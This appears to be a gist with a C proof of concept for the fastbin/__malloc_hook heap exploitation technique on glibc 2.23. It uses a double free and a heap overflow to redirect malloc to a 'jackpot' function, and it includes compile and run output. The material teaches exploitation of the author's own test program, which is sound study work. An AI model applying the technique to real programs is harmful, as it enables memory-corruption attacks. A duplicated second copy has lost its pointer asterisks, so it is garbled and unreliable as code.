inaz2 · January 6, 2020 12:05
diff --git a/fastbins_malloc_hook.c b/fastbins_malloc_hook.c
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>

 void jackpot() { puts("jackpot!"); }

 int main()
 {
    puts("[+] allocate p1, p2");
    char *p1 = malloc(0x100);
    char *p2 = malloc(0x100);
    printf("p1 = %p\n", p1);
    printf("p2 = %p\n", p2);

    puts("\n[+] free p1, p2");
    free(p1);
    free(p2);

    puts("\n[+] allocate p3");
    char *p3 = malloc(0x100);
    printf("p3 = %p\n", p3);

    puts("\n[+] p1 double free");
    free(p1);

    puts("\n[+] leak libc address via p3");
    void *arena_top = *(void **)p3;
    void *malloc_hook = arena_top - 0x68;
    printf("arena_top = %p\n", arena_top);
    printf("malloc_hook = %p\n", malloc_hook);

    puts("\n[+] allocate p4");
    char *p4 = malloc(0x100);
    printf("p4 = %p\n", p4);

    puts("\n[+] allocate p5 with size 0x60");
    char *p5 = malloc(0x60);
    printf("p5 = %p\n", p5);

    puts("\n[+] free p5");
    free(p5);

    puts("\n[+] abuse p4 overflow");
    memset(p4, 'A', 0x100);
    *(void **)(p4+0x108) = 0x71;
    *(void **)(p4+0x110) = (void *)malloc_hook-0x20-3;

    puts("\n[+] allocate p6, p7 with size 0x60");
    char *p6 = malloc(0x60);
    char *p7 = malloc(0x60);
    printf("p6 = %p\n", p6);
    printf("p7 = %p\n", p7);

    puts("\n[+] overwrite *(p7+0x13) = malloc_hook");
    memset(p7, 'A', 0x13);
    *(void **)(p7+0x13) = jackpot;

    puts("\n[+] allocate p8");
    char *p8 = malloc(0x100);
    printf("p8 = %p\n", p8);

    return 0;
 }
diff --git a/gistfile1.txt b/gistfile1.txt
 $ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook
 fastbins_malloc_hook.c: In function ‘main’:
 fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
     *(void **)(p4+0x108) = 0x71;
                               ^

 $ ./fastbins_malloc_hook
 [+] allocate p1, p2
 p1 = 0xd36420
 p2 = 0xd36530

 [+] free p1, p2

 [+] allocate p3
 p3 = 0xd36420

 [+] p1 double free

 [+] leak libc address via p3
 arena_top = 0x7f30e669eb78
 malloc_hook = 0x7f30e669eb10

 [+] allocate p4
 p4 = 0xd36420

 [+] allocate p5 with size 0x60
 p5 = 0xd36530

 [+] free p5

 [+] abuse p4 overflow

 [+] allocate p6, p7 with size 0x60
 p6 = 0xd36530
 p7 = 0x7f30e669eafd

 [+] overwrite *(p7+0x13) = malloc_hook

 [+] allocate p8
 jackpot!
 p8 = 0x9

 $ /lib/x86_64-linux-gnu/libc.so.6
 GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
 Copyright (C) 2016 Free Software Foundation, Inc.
 This is free software; see the source for copying conditions.
 There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
 PARTICULAR PURPOSE.
 Compiled by GNU CC version 5.3.1 20160413.
 Available extensions:
        crypt add-on version 2.1 by Michael Glad and others
        GNU Libidn by Simon Josefsson
        Native POSIX Threads Library by Ulrich Drepper et al
        BIND-8.2.3-T5B
 libc ABIs: UNIQUE IFUNC
 For bug reporting instructions, please see:
 <https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>

	void jackpot() { puts("jackpot!"); }

	int main()
	{
	puts("[+] allocate p1, p2");
	char *p1 = malloc(0x100);
	char *p2 = malloc(0x100);
	printf("p1 = %p\n", p1);
	printf("p2 = %p\n", p2);

	puts("\n[+] free p1, p2");
	free(p1);
	free(p2);

	puts("\n[+] allocate p3");
	char *p3 = malloc(0x100);
	printf("p3 = %p\n", p3);

	puts("\n[+] p1 double free");
	free(p1);

	puts("\n[+] leak libc address via p3");
	void arena_top = (void **)p3;
	void *malloc_hook = arena_top - 0x68;
	printf("arena_top = %p\n", arena_top);
	printf("malloc_hook = %p\n", malloc_hook);

	puts("\n[+] allocate p4");
	char *p4 = malloc(0x100);
	printf("p4 = %p\n", p4);

	puts("\n[+] allocate p5 with size 0x60");
	char *p5 = malloc(0x60);
	printf("p5 = %p\n", p5);

	puts("\n[+] free p5");
	free(p5);

	puts("\n[+] abuse p4 overflow");
	memset(p4, 'A', 0x100);
	(void *)(p4+0x108) = 0x71;
	(void )(p4+0x110) = (void )malloc_hook-0x20-3;

	puts("\n[+] allocate p6, p7 with size 0x60");
	char *p6 = malloc(0x60);
	char *p7 = malloc(0x60);
	printf("p6 = %p\n", p6);
	printf("p7 = %p\n", p7);

	puts("\n[+] overwrite *(p7+0x13) = malloc_hook");
	memset(p7, 'A', 0x13);
	(void *)(p7+0x13) = jackpot;

	puts("\n[+] allocate p8");
	char *p8 = malloc(0x100);
	printf("p8 = %p\n", p8);

	return 0;
	}
	$ gcc fastbins_malloc_hook.c -o fastbins_malloc_hook
	fastbins_malloc_hook.c: In function ‘main’:
	fastbins_malloc_hook.c:45:26: warning: assignment makes pointer from integer without a cast [-Wint-conversion]
	(void *)(p4+0x108) = 0x71;
	^

	$ ./fastbins_malloc_hook
	[+] allocate p1, p2
	p1 = 0xd36420
	p2 = 0xd36530

	[+] free p1, p2

	[+] allocate p3
	p3 = 0xd36420

	[+] p1 double free

	[+] leak libc address via p3
	arena_top = 0x7f30e669eb78
	malloc_hook = 0x7f30e669eb10

	[+] allocate p4
	p4 = 0xd36420

	[+] allocate p5 with size 0x60
	p5 = 0xd36530

	[+] free p5

	[+] abuse p4 overflow

	[+] allocate p6, p7 with size 0x60
	p6 = 0xd36530
	p7 = 0x7f30e669eafd

	[+] overwrite *(p7+0x13) = malloc_hook

	[+] allocate p8
	jackpot!
	p8 = 0x9

	$ /lib/x86_64-linux-gnu/libc.so.6
	GNU C Library (Ubuntu GLIBC 2.23-0ubuntu3) stable release version 2.23, by Roland McGrath et al.
	Copyright (C) 2016 Free Software Foundation, Inc.
	This is free software; see the source for copying conditions.
	There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A
	PARTICULAR PURPOSE.
	Compiled by GNU CC version 5.3.1 20160413.
	Available extensions:
	crypt add-on version 2.1 by Michael Glad and others
	GNU Libidn by Simon Josefsson
	Native POSIX Threads Library by Ulrich Drepper et al
	BIND-8.2.3-T5B
	libc ABIs: UNIQUE IFUNC
	For bug reporting instructions, please see:
	<https://bugs.launchpad.net/ubuntu/+source/glibc/+bugs>.